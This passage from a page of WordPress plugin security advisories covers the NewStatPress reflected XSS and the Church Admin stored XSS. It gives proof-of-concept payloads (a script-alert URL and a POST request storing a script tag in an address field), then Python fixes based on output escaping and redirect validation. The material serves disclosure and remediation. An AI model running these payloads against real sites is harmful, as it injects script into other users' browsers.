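        ("Mozilla/5.0 (X11; Linux x86_64)", "Linux", "https://example.org/"),
        ("curl/7.38.0", "Debian", ""),
    ])
    return conn


def search(conn, params, safe=True):
    """Run the search and return the matching user agents."""
    where, args = build_where_safe(params) if safe else build_where_vulnerable(params)
    return [row[0] for row in conn.execute(f"SELECT agent FROM visits WHERE {where}", args)]
```

In WordPress terms the value goes through $wpdb->prepare(); the identifier still needs the allow-list, because prepare() quotes values and cannot make a column name safe. The allow-list also happens to close the reflected XSS in the same file, since a rejected where$i never reaches the <th> output.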
 
 
(2) Authenticated XSS [CWE-79] (CVE-2015-4063)
----------------------------------------------
 
includes/nsp_search.php:128
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) {
    if($_GET["where$i"] != '') { print "<th scope='col'>".ucfirst($_GET["where$i"])."</th>"; }
}
+++++++++++++++++++++++++++++++++++++++++
 
* POC:
http://[domain]/wp-admin/admin.php?where1=<script>alert(String.fromCharCode(88,+83,+83))</script>&searchsubmit=Buscar&page=nsp_search
 
 
 Timeline
==========
2015-05-09: Discovered vulnerability.
2015-05-19: Vendor notification.
2015-05-19: Vendor response.
2015-05-20: Vendor fix.
2015-05-25: Public disclosure.


19 Jun 2015

WordPress Church Admin 0.800 Cross Site Scripting

# Exploit Title: Wordpress church_admin Stored XSS
# Date: 21-04-2015
# Exploit Author: woodspeed
# Vendor Homepage: https://wordpress.org/plugins/church-admin/
# Version: 0.800
# OSVDB ID : http://www.osvdb.org/show/osvdb/121304
# WPVULNDB ID : https://wpvulndb.com/vulnerabilities/7999
# Category: webapps
 
1. Description
 
The address field on the registration form is not sanitised before it is stored and rendered back to other users.
Visiting the Directory page then shows the confirm() window.
 
2. Proof of Concept
 
POST /wordpress/index.php/2015/05/21/church_admin-registration-form/
 
 
save=yes&church_admin_register=9d18cf0420&_wp_http_referer=%2Fwordpress%2Findex.php%2F2015%2F05%2F21%2Fchurch_admin-registration-form%2F&first_name%5B%5D=test&prefix%5B%5D=&last_name%5B%5D=test&mobile%5B%5D=%2B3670&people_type_id%5B%5D=1&email%5B%5D=test%40test.test&sex1=male&phone=%2B3670&address=%3Cscript%3Econfirm%28%29%3C%2Fscript%3E&lat=51.50351129583287&lng=-0.148193359375&recaptcha_challenge_field=03AHJ_VuvBRBO1Vts65lchUe_H_c1AuISniJ4rFDcaPyecjg-HypsHSZSfTkCyZMUC6PjVQAkkuFDfpnsKn28LU8wIMxb9nF5g7XnIYLt0qGzhXcgX4LSX5ul7tPX3RSdussMajZ-_N1YQnOMJZj8b5e5LJgK68Gjf8aaILIyxKud2OF2bmzoZKa56gt1jBbzXBEGASVMMFJ59uB9FsoJIzVRyMJmaXbbrgM01jnSseeg-thefo83fUZS9uuqrBQgqAZGYMmTWdgZ4xvrzXUdv5Zc76ktq-LWKPA&recaptcha_response_field=134
 
 
GET /wordpress/index.php/2015/05/21/church_admin-directory/
 
 
  <header class="entry-header">
    <h1 class="entry-title">church_admin directory</h1>  </header><!-- .entry-header -->
  <div class="entry-content">
    <p><a href="http://localhost/wordpress/?download=addresslist&addresslist=d759d84e16&member_type_id=1,2">PDF version</a></p><form name="ca_search" action="" method="POST">
<p><label style="width:75px;float:left;">Search</label><input name="ca_search" type="text"/><input type="submit" value="Go"/><input type="hidden" name="ca_search_nonce" value="99de1bedec"/></p></form><div class="tablenav"><div class="tablenav-pages"><div class="pagination"></div>
</div></div>
<div class="church_admin_address" itemscope itemtype="http://schema.org/Person">
  <div class="church_admin_name_address" >
    <p><span itemprop="name"><strong>test test</strong></span></p>
    <p><span itemprop="address" itemscope itemtype="http://schema.org/PostalAddress"><script>confirm()</script></span></p></div><!--church_admin_name_address-->
  <div class="church_admin_phone_email">
    <p> <a class="email" href="tel:+3670">+3670</a><br/>
    <a class="email"  href="tel:+3670"><span itemprop="telephone">+3670</span></a><br/>
<a class="email" itemprop="email" href="mailto:test@test.test">test@test.test</a><br/>
 
    </p>
 
  </div><!--church_admin_phone_email--> 
 
3. Solution
 
Fixed in version 0.810.
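The XSS reports on this page (Nextend's reflected redirect_to, Revslider's client_action, NewStatPress's reflected where$i inside a <th>, and Church Admin's stored address) all come down to the same fix: encode at the point of output, for the context the value lands in. The added example below is Python, not any plugin's code; its three renderers are hypothetical stand-ins for the corresponding output points (the sign-in link's URL layout in particular is invented), and html.escape() plays the role of htmlentities()/esc_html()/esc_attr(). For redirect_to it also applies the second check that parameter needs: a user-controlled redirect target should be restricted to the site itself, or escaping alone leaves an open redirect.

```python
import html
from urllib.parse import quote, urlsplit


def esc_html(value):
    """Text-node context (between tags)."""
    return html.escape(value, quote=False)


def esc_attr(value):
    """Attribute-value context: quotes must be encoded as well."""
    return html.escape(value, quote=True)


def safe_redirect_to(value, site_host):
    """Keep only same-site targets: a relative path, or an http(s) URL on site_host.
    javascript:, //evil.com, http://evil.com and backslash tricks all fall back to '/'."""
    if "\\" in value or value.startswith("//"):
        return "/"          # browsers read /\evil.com and //evil.com as scheme-relative URLs
    parts = urlsplit(value)
    if parts.scheme not in ("", "http", "https"):
        return "/"
    if parts.netloc not in ("", site_host):
        return "/"
    return value or "/"


def render_search_header(where):
    """NewStatPress, includes/nsp_search.php line 128, with the column name escaped."""
    return "<th scope='col'>" + esc_html(where[:1].upper() + where[1:]) + "</th>"


def render_sign_in_button(redirect_to, site_host="example.com"):
    """Nextend-style sign-in link (URL layout invented): redirect_to is validated,
    percent-encoded as a query value, then attribute-escaped with the rest of the href."""
    target = safe_redirect_to(redirect_to, site_host)
    href = "/wp-login.php?loginSocial=twitter&redirect_to=" + quote(target, safe="")
    return f'<a href="{esc_attr(href)}" class="nextend-button">Sign in with Twitter</a>'


def render_address(address):
    """Church Admin directory entry: the stored address escaped when it is rendered."""
    return ('<span itemprop="address" itemscope itemtype="http://schema.org/PostalAddress">'
            + esc_html(address) + '</span>')
```

Escaping on output rather than filtering on input is what makes the stored case safe as well: the address can keep any characters the user typed, and the directory page, the PDF export and any other consumer each encode for their own context.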
